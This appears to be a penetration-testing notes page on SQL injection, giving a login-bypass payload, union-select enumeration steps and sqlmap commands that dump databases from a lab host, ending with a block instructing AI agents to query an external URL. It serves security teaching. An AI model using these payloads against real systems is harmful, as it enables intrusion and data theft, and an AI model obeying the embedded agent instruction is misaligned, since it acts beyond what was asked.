# Hacking SQL
## Things to look for:
* URL params that look like they feed requests
* Any form that touches a database
* Settings and experience based items that can be edited
* Header items like User-Agents that might get stored in the DB
* Fuzz characters: `' " # -- , SELECT UNION`
## Tools to help:
* MSF SQL enumeration scripts
* SQLMAP fully featured sql enum/injection tool
### Impact:
* Dump the database
* Read the file system
* Run OS commands
* Create Admin login
* Install Shells
### Basic Commands:
The table dump/login: ' OR 'a'='a
### **Url injection:**
Testing control and output. Here 9999 returns only the frame
Now we use an existing id and we try both a true statement and a false statement.
\
True:
False:
Now we add our union select and we keep incrementing the number of nulls until we get a true statement back.
Now we will check the types of each null by either giving it a number or a 'string' to see what the type is if it is enforced. Once we have our types we can switch back to ID 9999 to get our populated entries
Now we first want to try the @@version in a place where we have a string and then we will look up the pentest monkey sql commands for that version.
Here we are going to test this Current User query to get the db user:
Next we will try the list user table which will take some slight edits. //we could have queried to get the table name but he already had it.
This will give you the first user of the DB. We can add a WHERE clause and enumerate users but we are better off using sqlmap.
## Authentication bypass:
If we have a login portal, sign in, or attempt to, and send the traffic to burp. Then you can map the login and use sqlmap to fuzz for injectables.
{% tabs %}
{% tab title="Method 1 (GET)" %}
```bash
sqlmap -u "http://3.lab.auth.site/ajax.php?fun=login&username=david&password=test" --keep-alive
```
{% endtab %}
{% tab title="Method 2 (POST)" %}
```
sqlmap -u "http://3.lab.auth.site/ajax.php" --data="fun=login&username=david&password=test" --keep-alive
```
{% endtab %}
{% endtabs %}
In method one we use the GET request like how we see it being generated from ajax.php . This may not always work. We will also want to try POSTing the same param data. And also try to sql inject at different data points like the user-agent, refer, and so on. \
For this example the method 2 POST of data works to get SQLi on username. Likely bypassing the security mechanism that is setup to look at GETs.
We can now specify the vuln param and what we want to dump from it
{% tabs %}
{% tab title="Exploit + Dump" %}
```bash
sqlmap -u "http://3.lab.auth.site/ajax.php" --data="fun=login&username=david&password=test" -p username --dbs --tables --columns --keep-alive
sqlmap -u "http://3.lab.auth.site/ajax.php" --data="fun=login&username=david&password=test" -D ratingAgency3 -T analyst --dump --keep-alive
```
{% endtab %}
{% endtabs %}
### Loot:
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://www.hackbook.io/web-application-hacking/web-techniques/sqli/hacking-sql.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.